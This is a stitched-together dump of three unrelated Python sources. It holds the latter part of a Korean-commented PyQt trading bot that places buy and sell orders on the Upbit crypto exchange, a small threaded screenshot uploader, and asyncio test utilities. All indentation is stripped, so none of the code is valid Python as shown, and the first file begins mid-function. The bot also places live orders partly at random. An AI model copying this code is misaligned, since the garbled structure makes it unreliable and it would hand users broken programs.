# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['ask_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['ask_size'])
price = orderbook_list[1][4][abs(hoga_level + 1)]['ask_price']
order_market_currency = order_market.split('-')[0]
# print('BUY ', order_market.split('-')[1], ' from ', order_market.split('-')[0])
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
position_amount = float(acc['balance'])
else:
print('account search error occurred')
return False
if buy_volume > 0:
volume = buy_volume
trade_amount = volume * price
if trade_amount > position_amount:
print('주문 금액이 보유현금보다 큽니다.')
return False
elif buy_amount > position_amount:
print('주문 금액이 보유현금보다 큽니다.')
return False
elif buy_amount < 0:
print('주문 금액이 0보다 작습니다.')
return False
elif buy_amount == 0:
trade_amount = config.amount_per_order
volume = round(trade_amount / price, 3)
if trade_amount > position_amount:
print('주문 금액이 보유현금보다 큽니다.')
return False
else:
trade_amount = buy_amount
volume = round(trade_amount / price, 3)
if trade_amount > position_amount:
print('주문 금액이 보유현금보다 큽니다.')
return False
# print('volume : ', volume, ' , price : ', price, ' , trade_amount : ', trade_amount, ' , position_amount : ', position_amount)
if trade_amount > position_amount:
print('주문 금액이 보유현금보다 큽니다.')
return False
else:
# 주문 생성
order_query = {'market': orderbook_list[1][0], 'side': side_val, # bid 매수 / ask 매도
'volume': volume, 'price': price, 'ord_type': 'limit'}
# print(order_query)
exchange_func.create_orders(order_query)
# 거래후 보유 종목 조회
self.search_account()
def sell_coin(self, order_market, side_val, hoga_level=0, sell_volume=0, sell_percent=0):
orderbook_market = order_market
orderbook_list = quotation_func.search_orderbook(orderbook_market)
price = 0
volume = 0
if side_val == 'bid' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['ask_price'],
# orderbook_list[1][4][hoga_level]['ask_size'])
price = float(orderbook_list[1][4][hoga_level]['ask_price'])
elif side_val == 'bid' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['bid_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['bid_size'])
price = float(orderbook_list[1][4][abs(hoga_level + 1)]['bid_price'])
elif side_val == 'ask' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['bid_price'],
# orderbook_list[1][4][hoga_level]['bid_size'])
price = float(orderbook_list[1][4][hoga_level]['bid_price'])
elif side_val == 'ask' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['ask_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['ask_size'])
price = float(orderbook_list[1][4][abs(hoga_level + 1)]['ask_price'])
if sell_volume > 0:
volume = float(sell_volume)
elif sell_percent > 0:
order_market_currency = order_market.split('-')[1]
print('SELL ', order_market.split('-')[1], ' to ', order_market.split('-')[0])
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
# print('avg_buy_price:', acc['avg_buy_price'], ', price: ', price)
volume = round(float(acc['balance']) * float(sell_percent) / 100, 3)
else:
print('account search error occurred')
return False
else:
order_market_currency = order_market.split('-')[1]
# print(order_market_currency)
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
# print('avg_buy_price:', acc['avg_buy_price'], ', price: ', price)
volume = float(acc['balance'])
else:
print('account search error occurred')
return False
# 금액과 수량이 정상적으로 계산되었을 때에만 매도 주문 실행
if volume > 0 and price > 0:
# 주문 생성
order_query = {'market': orderbook_list[1][0], 'side': side_val, # bid 매수 / ask 매도
'volume': volume, 'price': price, 'ord_type': 'limit'}
# print(order_query)
exchange_func.create_orders(order_query)
else:
print('금액 또는 수량에 문제가 있습니다.', str(volume), str(price))
# 거래후 보유 종목 조회
self.search_account()
def search_market(self):
result_data = quotation_func.search_market_list()
self.marketTable.setColumnCount(len(result_data[0]))
self.marketTable.setRowCount(len(result_data))
column_headers = ['기준화폐', '종목코드', '한글종목명', '영어종목명']
self.marketTable.setHorizontalHeaderLabels(column_headers)
for row, market in enumerate(result_data):
for col, val in enumerate(market):
item = QTableWidgetItem(val)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.marketTable.setItem(row, col, item)
self.marketTable.resizeColumnsToContents()
self.marketTable.resizeRowsToContents()
# print(self.findChild(QTableWidget, name='qtable'))
def search_account(self):
# 거래전 API KEY 있는지 체크하고 config 에 입력
self.searched_user_api_key = exchange_func.search_api_key()
# print('search : ', self.searched_user_api_key)
if self.searched_user_api_key['access_key'] == 'NONE':
print(">>> No User KEY ")
# TODO 화면 입력시 처리할 함수, 테스트용으로 여기서 수행
# exchange_func.insert_api_key()
row = 0
self.accountTable.setRowCount(row)
# 계좌정보 조회
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
for row, acc in enumerate(accounts_res.json()):
# print('현재 보유 항목 : ', row, ' ', acc)
# VTHO 는 거래가 안되서 제외함
if acc['currency'] == 'VTHO':
continue
if row == 0:
column_headers = list(acc.keys())
column_headers.append('buy amount')
column_headers.append('cur amount')
column_headers.append('rate')
self.accountTable.setColumnCount(len(column_headers))
self.accountTable.setHorizontalHeaderLabels(column_headers)
self.accountTable.setColumnWidth(0, 70)
self.accountTable.setColumnWidth(8, 60)
if acc['currency'] != acc['unit_currency']:
config.position_market.append([datetime.datetime.now(), acc['unit_currency'] + '-' + acc['currency']])
self.accountTable.insertRow(row)
for col, val in enumerate(acc.values()):
item = QTableWidgetItem(str(''))
if col in (2, 4):
self.accountTable.setColumnHidden(col, True)
# print(val)
elif col == 1:
if acc['currency'] == acc['unit_currency']:
val = 0
else:
val = val
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
elif col == 3:
val = round(float(val), 3)
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
else:
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.accountTable.setItem(row, col, item)
if acc['currency'] == acc['unit_currency']:
item = QTableWidgetItem(str(round(float(acc['balance']))))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 6, item)
else:
buy_price = float(acc['avg_buy_price'])
buy_amt = round(float(acc['balance']) * buy_price)
item = QTableWidgetItem(str(buy_amt))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 6, item)
market = acc['unit_currency'] + '-' + acc['currency']
for ticker_row in range(0, self.tickerTable.rowCount()):
if market == self.tickerTable.item(ticker_row, 0).text():
# print(ticker_row, ' ', market, ' ', self.tickerTable.item(ticker_row, 9).text())
item = QTableWidgetItem(self.tickerTable.item(ticker_row, 9).text())
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 7, item)
cur_price = float(self.tickerTable.item(ticker_row, 9).text())
# print('cur_price : ', cur_price)
rate = round((cur_price - buy_price) / buy_price * 100, 1)
item = QTableWidgetItem(str(rate))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 8, item)
# self.accountTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.accountTable.horizontalHeader().setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
# 찾은 대상으로 매매 처리
def trade_coin(self):
# print(' trade_coin START ', datetime.datetime.now())
# 계속 보유할 대상 조회
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# 보유하지 않을 대상 조회
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# 매수 대상 조회
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# 매도 대상 조회
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# 보유 종목 조회
account_market = self.search_account_market()
# print(account_market)
# 보유종목에서 매도 대상 처리
for market in account_market:
# 제외 대상 종목에 있으면 매도
if market in except_market:
if market != 'KRW-VTHO':
print(market, ' except target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
# 매도 대상에 있는 목록중 보유 대상 종목에 없으면 매도
if market in sell_market and \
market not in favor_market:
print(market, ' sell target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
# 보유 대상에 있는 목록중 보유종목에 없으면 매수
for market in favor_market:
if market not in account_market:
print(market, ' favor target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
# 매도 대상에 있는 목록중 제외 대상 종목에 없으면 매수
for market in buy_market:
if market not in account_market and \
market not in except_market:
print(market, ' buy target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
# print(' trade_coin END ', datetime.datetime.now())
# 찾은 대상으로 매매 처리
def buy_kimchi_coin(self):
# print(' buy_kimchi_coin START ', datetime.datetime.now())
# 계속 보유할 대상 조회
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# 보유하지 않을 대상 조회
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# 매수 대상 조회
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# 매도 대상 조회
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# 보유 종목 조회
account_market = self.search_account_market()
# print(account_market)
# 보유 대상에 있는 목록중 보유종목에 없으면 매수
# print(self.kimchi_market_list)
for market in self.kimchi_market_list:
if market not in account_market and \
market not in except_market and \
market not in sell_market:
# 시간봉 기준으로 30시간 이내에 상승한 적 없는 건 우선순위 부여
candle_1h = quotation_func.search_candle_chart(market, "minutes", 60, 30)
for candle in candle_1h[1:]:
if (float(candle[6]) - float(candle[3])) / float(candle[3]) >= 0.2:
# print('Already Up')
up_yn = 1
break
if up_yn == 1:
add_rate = 1.5
else:
add_rate = 1
# 랜덤으로 대상 선정
buy_rate = random.random()
# print('random :', buy_rate, ' , add_rate : ', add_rate)
buy_rate = buy_rate * add_rate
if buy_rate >= 0.7:
print(market, ' kimchi target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
time.sleep(0.2)
# print(' buy_kimchi_coin END ', datetime.datetime.now())
# 찾은 대상으로 매매 처리
def sell_kimchi_coin(self):
# print(' sell_kimchi_coin START ', datetime.datetime.now())
# 계속 보유할 대상 조회
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# 보유하지 않을 대상 조회
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# 매수 대상 조회
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# 매도 대상 조회
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# 보유 종목 조회
account_market = self.search_account_market()
# print(account_market)
# 보유종목에서 매도 대상 처리
for market in account_market:
# 매도 대상에 있는 목록중 보유 대상 종목에 없으면 매도
if market in self.kimchi_market_list and \
market not in favor_market and \
market not in buy_market:
print(market, ' kimchi target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
time.sleep(0.2)
# print(' sell_kimchi_coin END ', datetime.datetime.now())
# 당일 시세 조회
def search_today_ticker(self):
result_data = quotation_func.search_market_list()
# print(result_data)
market_list_all = []
for market in result_data:
market_list_all.append(market[1])
day_ticker_result = quotation_func.search_ticker(market_list_all)
# print(day_ticker_result)
self.tickerTable.setColumnCount(len(day_ticker_result[0]))
self.tickerTable.setRowCount(len(day_ticker_result) - 1)
column_headers = day_ticker_result[0]
sorted_day_ticker_result = sorted(day_ticker_result[1:], key=itemgetter(18), reverse=True)
self.tickerTable.setHorizontalHeaderLabels(column_headers)
# self.tickerTable.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# self.tickerTable.setColumnHidden(2, True)
for row, market in enumerate(sorted_day_ticker_result):
# print(market)
for col, val in enumerate(market):
# if row == 0:
# print(val)
if col in (1, 2, 3, 4, 5, 12, 13, 16, 19, 20, 25):
val = ''
self.tickerTable.setColumnHidden(col, True)
elif col == 15:
val = round(float(val) * 100, 2)
elif col in (17, 18):
val = round(val / 1000000)
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tickerTable.setItem(row, col, item)
# 순위 내의 수익률 계산
def calc_profit(self, rank):
rowcount = self.tickerTable.rowCount()
if rank > rowcount:
return False
buy_amount = 10000
sum_value = 0
for i in range(0, rank):
# print(self.tickerTable.item(i, 0).text(), ' : ', self.tickerTable.item(i, 6).text(),
# self.tickerTable.item(i, 15).text(),
# round(float(self.tickerTable.item(i, 6).text()) *
# float(self.tickerTable.item(i, 15).text()) / 100,2))
# 각 마켓의 수익금액
sum_value = sum_value + buy_amount * float(self.tickerTable.item(i, 15).text()) / 100
# 수익률 평균 계산
return round(sum_value / rank / 100, 3)
def calc_top_item_profit(self):
self.txtProfit10.setText(str(self.calc_profit(10)))
self.txtProfit20.setText(str(self.calc_profit(50)))
def search_market_list(self):
# print("############# market list ###########")
url = "https://api.upbit.com/v1/market/all"
querystring = {"isDetails": "false"}
response = requests.request("GET", url, params=querystring)
# print(response.text)
markets = []
# currencies = ["KRW", "BTC", "USDT"]
currencies = ["KRW"]
i = 0
for currency in currencies:
# print(type(list(result.values())), result)
for result in response.json():
if result['market'].find(currency) == 0:
# currencies.append("KRW")
if i == 0:
pass
else:
markets.append(list(result.values()))
# title 을 제거하면서 index를 -1 처리함
markets[i-1].insert(0, currency)
i += 1
# print(markets)
return markets
def ticker_buy_coin(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
print(market, ' TICKER MANUAL BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
def acc_sell_coin(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
print(market, ' ACCOUNT MANUAL SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
def sell_all_coin(self):
print(time.strftime('%Y%m%d %H%M%s'), ' : sell_all_coin start')
# 거래량으로 매도 대상 찾기
sell_target = self.search_account_market()
# print(sell_target)
# 찾은 대상으로 주문하기
for market in sell_target:
self.sell_coin(market, 'ask', 0, 0, 0)
time.sleep(0.5)
# 거래량 급등하는 종목 선정
def buy_trade_volume_increase(self):
# print(' buy_trade_volume_increase START ', datetime.datetime.now())
ticks_target = []
trade_market_list = quotation_func.search_market_list()
# print(trade_market_list)
for market in trade_market_list[:50]:
order, day_market = quotation_func.search_ticks(market[1], 300)
if day_market != 'X':
ticks_target.append([order, day_market])
time.sleep(0.3)
# 순간 체결량이 많은 순서로 정렬
ticks_target.sort()
cur_time = datetime.datetime.now().strftime('%Y%m%d %H:%M:%s')
if len(ticks_target) > 0:
print(cur_time, ' : ticks_target all : ', ticks_target)
# 찾은 대상으로 주문하기
for target in ticks_target:
market = target[1]
print('aa', target, ' xx ', market)
item = QTableWidgetItem(market)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.buyTable.setItem(self.buyTable.rowCount(), 0, item)
self.buyTable.setItem(self.buyTable.rowCount(), 1, QTableWidgetItem(cur_time))
# 거래량과 1분봉 기준 상승주 조회
buy_list = quotation_func.find_buy_target_by_amount(trade_market_list[:50])
for market in buy_list:
item = QTableWidgetItem(market)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.buyTable.setItem(self.buyTable.rowCount(), 0, item)
self.buyTable.setItem(self.buyTable.rowCount(), 1, QTableWidgetItem(cur_time))
# print(' buy_trade_volume_increase END ', datetime.datetime.now())
# 24시간이내 최고가에서 하락하는 종목 선정
def sell_high_coin(self):
# print(time.strftime('%Y%m%d %H%M%s'), ' : sell_high_coin start')
# 거래량으로 매도 대상 찾기
sell_target = quotation_func.find_sell_high_target()
# print(sell_target)
# 계속 보유할 대상 조회
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
cur_time = datetime.datetime.now().strftime('%Y%m%d %H:%M:%s')
if len(sell_target) > 0:
print(cur_time, ' : sell_target all : ', sell_target)
# 찾은 대상으로 주문하기
for market in sell_target:
if market not in favor_market:
# self.sell_coin(market, 'ask', 0, 0, 0)
item = QTableWidgetItem(market)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.sellTable.setItem(self.sellTable.rowCount(), 0, item)
self.sellTable.setItem(self.sellTable.rowCount(), 1, QTableWidgetItem(cur_time))
time.sleep(0.5)
def watch_market(self):
# print('monitor : ', self.watch_market_list)
for market in self.watch_market_list:
if market == 'KRW-BTC':
quotation_func.watching_market(market, 0.003, 0.01)
elif market == 'KRW-ETC':
quotation_func.watching_market(market, 0.006, 0.02)
else:
quotation_func.watching_market(market, 0.01, 0.03)
time.sleep(0.5)
def do_time_schedule(self):
# print(' do_time_schedule START ')
self.search_today_ticker()
self.search_account()
cur_datetime = datetime.datetime.now()
cur_weekday = cur_datetime.weekday()
cur_time = cur_datetime.strftime('%H:%M')
cur_minute = cur_datetime.strftime('%M')
if cur_weekday == 6 and cur_time <= '08:30':
print('일요일 오전 쉬기 ')
pass
elif cur_weekday == 5 and cur_time == '11:55':
print('일요일 오전 쉬기, 모두 팔아버림')
self.sell_all_coin()
elif cur_time == '08:58':
self.kimchi_time = True
print('시간 : ', cur_time)
self.sell_all_coin()
self.buy_kimchi_coin()
elif cur_time == '09:10':
print('김치코인 정리')
self.sell_kimchi_coin()
self.kimchi_time = False
# elif cur_minute in ('15', '35'):
#
# self.kimchi_time = True
# print('시간 2: ', cur_time)
# self.sell_all_coin()
# self.buy_kimchi_coin()
#
# elif cur_minute in ('25', '45'):
#
# print('김치코인 정리2')
# self.sell_kimchi_coin()
# self.kimchi_time = False
elif self.chbAutoTrade.isChecked():
if self.kimchi_time:
print(' 김치 타임 쉬기 ')
else:
# self.trade_coin()
# 매수 대상 찾기 1
p_buy1 = mp.Process(name='trade_by_volume', target=self.buy_trade_volume_increase)
p_buy1.start()
# self.buy_trade_volume_increase()
# 매도 대상 찾기 1
p_sell1 = mp.Process(name='sell_high_coin', target=self.sell_high_coin)
p_sell1.start()
# self.sell_high_coin()
# 시장 감시
p_watch1 = mp.Process(name='watch_market', target=self.watch_market)
p_watch1.start()
# TODO
# 코인마켓캡에서 순위 가져오기, binance 에서 제공할 수도 있음
# API 접속키 추가
def update_config_market(self, cmd, market_kind, market):
config_file = configparser.ConfigParser()
if config_file.read(config.ini_file_name, encoding='utf-8'):
print('exists')
else:
print('not exists')
if not config_file.has_section('MARKET'):
config_file.add_section('MARKET')
if cmd == 'I':
# print(config_file['MARKET'][market_kind])
if config_file.has_option('MARKET', market_kind):
config_file['MARKET'][market_kind] = config_file['MARKET'][market_kind] + ',' + market
# print('a : ', config_file['MARKET'][market_kind])
else:
config_file['MARKET'][market_kind] = market
with open(config.ini_file_name, 'w', encoding='utf-8') as configfile:
config_file.write(configfile)
elif cmd == 'D':
if config_file.has_option('MARKET', market_kind):
pos_market = config_file['MARKET'][market_kind].find(market)
content1 = config_file['MARKET'][market_kind][0:pos_market]
content2 = config_file['MARKET'][market_kind][config_file['MARKET'][market_kind].find(',', pos_market)+1:]
config_file['MARKET'][market_kind] = content1 + content2
with open(config.ini_file_name, 'w', encoding='utf-8') as configfile:
config_file.write(configfile)
return True
if __name__ == '__main__':
mp.freeze_support()
app = QApplication(sys.argv)
window = MyWindow()
window.setGeometry(10, 10, 1200, 800)
# window.show()
window.showFullScreen()
sys.exit(app.exec_())
|
lm_upload.py
|
# -*- coding: utf-8 -*-
import os
import threading
from lm.lm_api import LMApi
class LMUpload(object):
def __init__(self, files, log_path):
self.files = files
self.log_path = log_path
self.api = LMApi()
def set_upload(self, task_image_path):
threads = []
for file in self.files:
if file.endswith(".png"):
uuid = file[:-4]
thread = threading.Thread(target=self.upload, args=(task_image_path, uuid, file))
threads.append(thread)
else:
os.remove(os.path.join(task_image_path, file))
else:
for t in threads:
t.start()
for t in threads:
t.join()
def upload(self, task_image_path, uuid, file):
try:
self.api.upload_screen_shot(task_image_path, uuid, self.log_path)
os.remove(os.path.join(task_image_path, file))
except:
pass
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import compat
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
from test import support
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(os.__file__), 'test', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop):
@coroutine
def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
keyfile = ONLYKEY
certfile = ONLYCERT
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError(f'fd {fd} is not registered')
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError(
f'unexpected callback: {handle._callback} != {callback}')
if handle._args != args:
raise AssertionError(
f'unexpected callback args: {handle._args} != {args}')
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError(f'fd {fd} is registered')
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def unpatch_get_running_loop(self):
events._get_running_loop = self._get_running_loop
def setUp(self):
self._get_running_loop = events._get_running_loop
events._get_running_loop = lambda: None
